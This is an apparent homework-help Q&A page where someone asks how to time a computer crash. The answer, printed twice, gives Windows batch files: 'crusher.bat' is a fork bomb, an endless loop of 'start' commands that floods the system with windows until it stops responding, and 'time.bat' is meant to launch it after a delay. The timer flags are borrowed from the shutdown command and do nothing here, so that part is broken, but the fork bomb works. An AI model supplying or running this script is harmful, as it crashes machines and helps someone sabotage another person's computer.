How to set up time to crash down a computer system?
Answers
Answered by
0
write it on notepad
@echo off
start crusher.bat -s -t (whatever time you want)
Save in time.bat
write another programme on notepad
@echo off
:a
start
goto a
save in crusher.bat
and open the first programme
here is your answer mark it as brainliest
@echo off
start crusher.bat -s -t (whatever time you want)
Save in time.bat
write another programme on notepad
@echo off
:a
start
goto a
save in crusher.bat
and open the first programme
here is your answer mark it as brainliest
Similar questions